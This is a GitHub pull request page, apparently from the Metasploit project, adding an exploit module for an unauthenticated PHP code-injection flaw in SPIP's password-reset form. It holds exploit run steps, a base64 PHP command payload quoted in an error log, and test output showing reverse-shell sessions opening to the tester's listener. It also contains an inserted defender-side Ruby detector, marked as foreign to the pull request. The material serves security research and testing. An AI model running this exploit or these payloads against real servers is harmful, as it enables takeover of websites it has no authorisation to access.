Add a module for the latest SPIP vuln #17711

Merged: 1 commit, Apr 17, 2023

Conversation

@jvoisin (Contributor) commented Feb 27, 2023

/!\ Please squash this PR before merging it. /!\

This module exploits a PHP code injection in SPIP. The vulnerability exists in
the oubli parameter and allows an unauthenticated user to execute arbitrary
commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.

Verification

List the steps needed to make sure this thing works

  • wget https://git.spip.net/spip-contrib-outils/checkout/src/branch/master/checkout.php
  • php checkout.php spip -b4.0.0 ./spip
  • cd ./spip
  • php -S 127.0.0.1:8080
  • Check the Notes below.
  • Start msfconsole
  • use exploit/unix/webapp/spip_rce_form
  • set PAYLOAD php/exec
  • set CMD 'touch /tmp/pwn.txt'
  • Verify that the file /tmp/pwn.txt was created.

Notes

It seems that the php payload is currently broken under PHP 8, since it doesn't wrap its base64-encoded payload between quotes, resulting in the following error:

[Tue Feb 28 20:49:20 2023] 127.0.0.1:38911 [500]: POST /spip.php?page=spip_pass&lang=fr - Uncaught Error: Undefined constant "Lyo8P3BocCAvKiovIEBlcnJvcl9yZXBvcnRpbmcoMCk7IEBzZXRfdGltZV9saW1pdCgwKTsgQGlnbm9yZV91c2VyX2Fib3J0KDEpOyBAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsgJEZuckZadT1AaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKTsgaWYoIWVtcHR5KCRGbnJGWnUpKXsgJEZuckZadT1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICRGbnJGWnUpOyAkRm5yRlp1PWV4cGxvZGUoJywnLCAkRm5yRlp1KTsgJEZuckZadT1hcnJheV9tYXAoJ3RyaW0nLCAkRm5yRlp1KTsgfWVsc2V7ICRGbnJGWnU9YXJyYXkoKTsgfSAkYyA9IGJhc2U2NF9kZWNvZGUoImRHOTFZMmdnTDNSdGNDOXdkMjVsWkM1MGVIUT0iKTsgaWYgKEZBTFNFICE9PSBzdHJwb3Moc3RydG9sb3dlcihQSFBfT1MpLCAnd2luJyApKSB7ICRjPSRjLiIgMj4mMVxuIjsgfSAkem9BeUFJUT0naXNfY2FsbGFibGUnOyAkR0xNRGFrPSdpbl9hcnJheSc7IGlmKCR6b0F5QUlRKCdleGVjJylhbmQhJEdMTURhaygnZXhlYycsJEZuckZadSkpeyAkcGlUYU1uST1hcnJheSgpOyBleGVjKCRjLCRwaVRhTW5JKTsgJHBpVGFNbkk9am9pbihjaHIoMTApLCRwaVRhTW5JKS5jaHIoMTApOyB9ZWxzZSBpZigkem9BeUFJUSgncG9wZW4nKWFuZCEkR0xNRGFrKCdwb3BlbicsJEZuckZadSkpeyAkZnA9cG9wZW4oJGMs" in /home/jvoisin/dev/spip/ecrire/public/evaluer_page.php(51) : eval()'d code:19

This can be fixed by changing return "eval(base64_decode(" + b64 + ")); to return "eval(base64_decode('" + b64 + "')); in modules/encoders/php/base64.rb, and this is exactly what #17723 is doing.

This vulnerability doesn't have a CVE.
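The version ranges in the description and the PHP-server error in the Notes, illustrated with an added Ruby example that is not part of this pull request, of Metasploit or of SPIP: an inventory check that applies the fixed releases stated above (<3.2.18, <4.0.10, <4.1.18, <4.2.1) to a version string, and a detector for the kind of 500 error the PHP built-in server logged when the broken encoder sent an unquoted base64 blob to the password-reset form. The log lines, the file path and the base64 content below are constructed for the example; the function names are my own.

```ruby
# Added example (not from the pull request or from Metasploit/SPIP): two
# defender-side checks built only from the facts stated in the PR description.
require 'base64'

# First fixed release of each affected branch, as given in the description:
# vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
SPIP_FIXED_VERSIONS = {
  '3.2' => [3, 2, 18],
  '4.0' => [4, 0, 10],
  '4.1' => [4, 1, 18],
  '4.2' => [4, 2, 1]
}.freeze

# "4.0.9" -> [4, 0, 9]; nil when the string is not a dotted version.
def parse_spip_version(str)
  m = str.to_s.strip.match(/\A(\d+)\.(\d+)\.(\d+)/)
  m && m.captures.map(&:to_i)
end

# true  : affected branch, below the fixed release
# false : affected branch, at or above the fixed release
# nil   : branch not covered by the advisory text, or unparsable input
def spip_version_vulnerable?(str)
  v = parse_spip_version(str)
  return nil unless v
  fixed = SPIP_FIXED_VERSIONS["#{v[0]}.#{v[1]}"]
  return nil unless fixed
  (v <=> fixed).negative?
end

# PHP built-in server log line: "[date] client:port [status]: METHOD uri - message"
PHP_SERVER_LOG = /\A\[(?<ts>[^\]]+)\] (?<client>\S+) \[(?<status>\d{3})\]: (?<method>[A-Z]+) (?<uri>\S+)(?: - (?<msg>.*))?\z/

def parse_php_server_log(line)
  m = PHP_SERVER_LOG.match(line.strip)
  return nil unless m
  { ts: m[:ts], client: m[:client], status: m[:status].to_i,
    method: m[:method], uri: m[:uri], msg: m[:msg].to_s }
end

# True when the text carries a long base64 run that decodes to PHP source.
def base64_php_blob?(text)
  text.scan(%r{[A-Za-z0-9+/]{64,}={0,2}}).any? do |blob|
    decoded = Base64.decode64(blob)
    decoded.include?('<?php') || decoded.include?('eval(')
  end
end

# Flags POSTs to the password-reset form (spip.php?page=spip_pass) that ended in
# an uncaught PHP error, and additionally when that error echoes base64 PHP code.
def suspicious_spip_pass_requests(lines)
  lines.filter_map do |line|
    e = parse_php_server_log(line)
    next unless e && e[:method] == 'POST'
    next unless e[:uri].start_with?('/spip.php') && e[:uri].include?('page=spip_pass')
    reasons = []
    reasons << 'php_error_on_reset_form' if e[:status] == 500 && e[:msg].include?('Uncaught Error')
    reasons << 'base64_php_in_error' if base64_php_blob?(e[:msg])
    next if reasons.empty?
    e.merge(reasons: reasons)
  end
end

# Constructed sample log: the blob is a harmless PHP snippet encoded here, not
# the payload from the PR, and the file path is a placeholder.
SAMPLE_BLOB = Base64.strict_encode64('/*<?php /**/ @error_reporting(0); echo "constructed sample"; ?>')
SAMPLE_LOG = [
  '[Tue Feb 28 20:48:01 2023] 127.0.0.1:38900 [200]: GET /spip.php?page=sommaire',
  '[Tue Feb 28 20:48:40 2023] 127.0.0.1:38905 [200]: POST /spip.php?page=spip_pass&lang=fr',
  "[Tue Feb 28 20:49:20 2023] 127.0.0.1:38911 [500]: POST /spip.php?page=spip_pass&lang=fr - " \
    "Uncaught Error: Undefined constant \"#{SAMPLE_BLOB}\" in " \
    "/var/www/spip/ecrire/public/evaluer_page.php(51) : eval()'d code:19"
].freeze

if __FILE__ == $PROGRAM_NAME
  %w[3.2.17 3.2.18 4.2.0 4.2.1 4.3.0].each do |v|
    puts "#{v}: #{spip_version_vulnerable?(v).inspect}"
  end
  suspicious_spip_pass_requests(SAMPLE_LOG).each do |hit|
    puts "#{hit[:ts]} #{hit[:client]} -> #{hit[:reasons].join(',')}"
  end
end
```

The version check deliberately answers nil for branches the description does not mention (for instance 4.3.x or 3.1.x) rather than guessing, so an inventory script can separate "known fixed" from "not covered by this advisory". The log detector keys on the same symptom the Notes show: a legitimate password-reset POST returns 200 with no error text, whereas a request that pushed PHP code through the form and tripped PHP 8's undefined-constant error leaves a 500 whose message carries the base64 source.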

@jvoisin jvoisin marked this pull request as ready for review February 28, 2023 20:14
@laluka commented Feb 28, 2023

Worked on this one as a rubber-ducky debugger; for what it's worth, this exploit is quite minimal (which is perfect for lowering the number of bugs) and gets the job done.
Thanks for this @jvoisin! 💮

@jheysel-r7 (Contributor) left a comment

Hey @jvoisin, thanks so much for the awesome contribution. I've made a couple of minor suggestions.

Mainly, I think this would be a great opportunity to make use of the command stager functionality in Metasploit. This gives the user the option to either run a Unix command when exploiting the module or return a Meterpreter session. More about the command stager can be read here: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html.

Let me know if you have any questions at all regarding command stagers, I'd be happy to help in any way I could.

Review comments (outdated, resolved) on:
  • documentation/modules/exploit/unix/webapp/spip_rce_form.md
  • modules/exploits/unix/webapp/spip_rce_form.rb (5 threads)
@jheysel-r7 (Contributor) left a comment

Hey @jvoisin, thanks for making those changes. I've made a couple more suggestions which fix the linting issue and standardize the execute_command method. I was hoping they would also fix the module, but I couldn't seem to get it working.

Could you please:

  1. Retest the module
  2. Update the Scenarios section of the documentation.

I'm not sure what's preventing the shell from returning; hard to say with the link to the PoC still returning a 502. Thank you!

Review comments (resolved) on modules/exploits/unix/webapp/spip_rce_form.rb (2 threads, one outdated)
@jheysel-r7 jheysel-r7 merged commit db853f9 into rapid7:master Apr 17, 2023
@jheysel-r7 (Contributor) commented

Thanks for making all those changes @jvoisin! Testing looked great, I've squashed and merged 🚀

msf6 exploit(unix/webapp/spip_rce_form) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(unix/webapp/spip_rce_form) > set rport 8000
rport => 8000
msf6 exploit(unix/webapp/spip_rce_form) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:43456) at 2023-04-17 15:13:23 -0400


meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.131 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(unix/webapp/spip_rce_form) > set target 1
target => 1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP double handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo PRx2DFOeACZbW9jV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "PRx2DFOeACZbW9jV\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.131:44028) at 2023-04-17 15:14:25 -0400

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
uname -a
Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@jvoisin jvoisin deleted the spip branch April 18, 2023 11:49
@dwelch-r7 dwelch-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 21, 2023
@dwelch-r7 (Contributor) commented

Release Notes

This module exploits a PHP code injection in SPIP. The vulnerability exists in the oubli parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.

Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)

7 participants